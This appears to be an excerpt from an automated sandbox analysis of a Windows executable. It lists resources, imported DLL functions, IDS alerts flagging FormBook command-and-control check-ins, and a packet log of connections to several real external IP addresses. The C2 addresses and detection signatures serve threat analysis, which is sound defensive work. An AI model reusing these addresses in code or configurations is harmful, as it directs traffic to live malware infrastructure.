                                                      RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcc7b80x55609data1.0003317081540155
                                                      RT_GROUP_ICON0x121dc40x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x121e3c0x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x121e500x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x121e640x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x121e780xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x121f540x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                      DLLImport
                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-11-24T08:13:05.360687+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949803161.97.168.24580TCP
                                                      2024-11-24T08:13:05.360687+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949803161.97.168.24580TCP
                                                      2024-11-24T08:13:23.188575+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94984527.124.4.24680TCP
                                                      2024-11-24T08:13:25.829233+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94985127.124.4.24680TCP
                                                      2024-11-24T08:13:28.485540+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94985727.124.4.24680TCP
                                                      2024-11-24T08:13:31.110419+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94986327.124.4.24680TCP
                                                      2024-11-24T08:13:31.110419+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.94986327.124.4.24680TCP
                                                      2024-11-24T08:13:38.954469+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949883149.88.81.19080TCP
                                                      2024-11-24T08:13:41.626315+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949889149.88.81.19080TCP
                                                      2024-11-24T08:13:44.298121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949895149.88.81.19080TCP
                                                      2024-11-24T08:14:07.393960+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949902149.88.81.19080TCP
                                                      2024-11-24T08:14:07.393960+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949902149.88.81.19080TCP
                                                      2024-11-24T08:14:15.220013+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94996785.159.66.9380TCP
                                                      2024-11-24T08:14:17.891846+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94997385.159.66.9380TCP
                                                      2024-11-24T08:14:20.563785+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94997985.159.66.9380TCP
                                                      2024-11-24T08:14:23.128933+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94998685.159.66.9380TCP
                                                      2024-11-24T08:14:23.128933+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.94998685.159.66.9380TCP
                                                      2024-11-24T08:14:30.104854+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949987185.27.134.14480TCP
                                                      2024-11-24T08:14:32.766640+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949988185.27.134.14480TCP
                                                      2024-11-24T08:14:35.517068+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949989185.27.134.14480TCP
                                                      2024-11-24T08:14:38.188508+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949990185.27.134.14480TCP
                                                      2024-11-24T08:14:38.188508+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949990185.27.134.14480TCP
                                                      2024-11-24T08:14:45.532572+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949991172.67.145.23480TCP
                                                      2024-11-24T08:14:47.949610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949992172.67.145.23480TCP
                                                      2024-11-24T08:14:50.602328+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949993172.67.145.23480TCP
                                                      2024-11-24T08:14:53.273537+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949994172.67.145.23480TCP
                                                      2024-11-24T08:14:53.273537+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949994172.67.145.23480TCP
                                                      2024-11-24T08:15:00.280976+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949995172.67.167.14680TCP
                                                      2024-11-24T08:15:02.945910+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949996172.67.167.14680TCP
                                                      2024-11-24T08:15:05.598869+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949997172.67.167.14680TCP
                                                      2024-11-24T08:15:08.316038+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949998172.67.167.14680TCP
                                                      2024-11-24T08:15:08.316038+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949998172.67.167.14680TCP
                                                      2024-11-24T08:15:15.532547+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949999154.88.22.11080TCP
                                                      2024-11-24T08:15:18.188878+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.950000154.88.22.11080TCP
                                                      2024-11-24T08:15:20.860837+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.950001154.88.22.11080TCP
                                                      2024-11-24T08:15:23.516537+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.950002154.88.22.11080TCP
                                                      2024-11-24T08:15:23.516537+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.950002154.88.22.11080TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 24, 2024 08:13:03.891047001 CET4980380192.168.2.9161.97.168.245
                                                      Nov 24, 2024 08:13:04.010585070 CET8049803161.97.168.245192.168.2.9
                                                      Nov 24, 2024 08:13:04.013638973 CET4980380192.168.2.9161.97.168.245
                                                      Nov 24, 2024 08:13:04.023580074 CET4980380192.168.2.9161.97.168.245
                                                      Nov 24, 2024 08:13:04.143747091 CET8049803161.97.168.245192.168.2.9
                                                      Nov 24, 2024 08:13:05.360497952 CET8049803161.97.168.245192.168.2.9
                                                      Nov 24, 2024 08:13:05.360518932 CET8049803161.97.168.245192.168.2.9
                                                      Nov 24, 2024 08:13:05.360529900 CET8049803161.97.168.245192.168.2.9
                                                      Nov 24, 2024 08:13:05.360563040 CET8049803161.97.168.245192.168.2.9
                                                      Nov 24, 2024 08:13:05.360687017 CET4980380192.168.2.9161.97.168.245
                                                      Nov 24, 2024 08:13:05.365811110 CET4980380192.168.2.9161.97.168.245
                                                      Nov 24, 2024 08:13:05.485285044 CET8049803161.97.168.245192.168.2.9
                                                      Nov 24, 2024 08:13:21.588366985 CET4984580192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:21.707976103 CET804984527.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:21.708125114 CET4984580192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:21.728193998 CET4984580192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:21.847743988 CET804984527.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:23.145857096 CET804984527.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:23.188575029 CET4984580192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:23.235517979 CET4984580192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:24.254781961 CET4985180192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:24.374403954 CET804985127.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:24.374527931 CET4985180192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:24.390343904 CET4985180192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:24.510009050 CET804985127.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:25.775538921 CET804985127.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:25.829232931 CET4985180192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:25.891846895 CET4985180192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:25.977045059 CET804985127.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:25.977124929 CET4985180192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:26.910438061 CET4985780192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:27.029958963 CET804985727.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:27.030097961 CET4985780192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:27.053759098 CET4985780192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:27.173264980 CET804985727.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:27.173343897 CET804985727.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:28.431194067 CET804985727.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:28.485539913 CET4985780192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:28.563674927 CET4985780192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:28.632745028 CET804985727.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:28.632807016 CET4985780192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:29.582707882 CET4986380192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:29.702245951 CET804986327.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:29.702349901 CET4986380192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:29.712353945 CET4986380192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:29.831813097 CET804986327.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:31.067595005 CET804986327.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:31.110419035 CET4986380192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:31.260648966 CET804986327.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:31.260775089 CET4986380192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:31.261722088 CET4986380192.168.2.927.124.4.246
                                                      Nov 24, 2024 08:13:31.381211996 CET804986327.124.4.246192.168.2.9
                                                      Nov 24, 2024 08:13:37.316453934 CET4988380192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:37.436002970 CET8049883149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:37.436120987 CET4988380192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:37.452442884 CET4988380192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:37.571938992 CET8049883149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:38.954468966 CET4988380192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:39.116806030 CET8049883149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:39.974329948 CET4988980192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:40.093957901 CET8049889149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:40.094085932 CET4988980192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:40.112900972 CET4988980192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:40.233556986 CET8049889149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:41.626315117 CET4988980192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:41.788746119 CET8049889149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:42.644954920 CET4989580192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:42.765371084 CET8049895149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:42.765480995 CET4989580192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:42.781936884 CET4989580192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:42.901529074 CET8049895149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:42.901617050 CET8049895149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:44.298120975 CET4989580192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:44.460805893 CET8049895149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:45.317387104 CET4990280192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:45.436916113 CET8049902149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:45.437052965 CET4990280192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:45.447259903 CET4990280192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:13:45.566796064 CET8049902149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:59.313846111 CET8049883149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:13:59.313918114 CET4988380192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:14:02.073148012 CET8049889149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:14:02.073277950 CET4988980192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:14:04.673423052 CET8049895149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:14:04.673623085 CET4989580192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:14:07.393780947 CET8049902149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:14:07.393959999 CET4990280192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:14:07.394805908 CET4990280192.168.2.9149.88.81.190
                                                      Nov 24, 2024 08:14:07.514225960 CET8049902149.88.81.190192.168.2.9
                                                      Nov 24, 2024 08:14:13.576874971 CET4996780192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:13.696327925 CET804996785.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:13.699794054 CET4996780192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:13.715888023 CET4996780192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:13.835557938 CET804996785.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:15.220012903 CET4996780192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:15.339952946 CET804996785.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:15.340111971 CET4996780192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:16.238993883 CET4997380192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:16.358582973 CET804997385.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:16.360235929 CET4997380192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:16.376543999 CET4997380192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:16.496042967 CET804997385.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:17.891845942 CET4997380192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:18.011698008 CET804997385.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:18.011925936 CET4997380192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:18.911324978 CET4997980192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:19.030869961 CET804997985.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:19.032071114 CET4997980192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:19.048573971 CET4997980192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:19.168292046 CET804997985.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:19.168322086 CET804997985.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:20.563785076 CET4997980192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:20.683605909 CET804997985.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:20.683670044 CET4997980192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:21.583349943 CET4998680192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:21.703031063 CET804998685.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:21.703829050 CET4998680192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:21.713526011 CET4998680192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:21.834846020 CET804998685.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:23.128655910 CET804998685.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:23.128717899 CET804998685.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:23.128932953 CET4998680192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:23.131875038 CET4998680192.168.2.985.159.66.93
                                                      Nov 24, 2024 08:14:23.251301050 CET804998685.159.66.93192.168.2.9
                                                      Nov 24, 2024 08:14:28.736306906 CET4998780192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:28.855837107 CET8049987185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:28.855921984 CET4998780192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:28.872050047 CET4998780192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:28.991597891 CET8049987185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:30.104646921 CET8049987185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:30.104785919 CET8049987185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:30.104854107 CET4998780192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:30.376213074 CET4998780192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:31.395268917 CET4998880192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:31.514858007 CET8049988185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:31.515012980 CET4998880192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:31.531040907 CET4998880192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:31.650499105 CET8049988185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:32.766488075 CET8049988185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:32.766561031 CET8049988185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:32.766639948 CET4998880192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:33.032576084 CET4998880192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:34.056569099 CET4998980192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:34.176145077 CET8049989185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:34.176269054 CET4998980192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:34.191000938 CET4998980192.168.2.9185.27.134.144
                                                      Nov 24, 2024 08:14:34.310745955 CET8049989185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:34.310760021 CET8049989185.27.134.144192.168.2.9
                                                      Nov 24, 2024 08:14:35.516946077 CET8049989185.27.134.144192.168.2.9
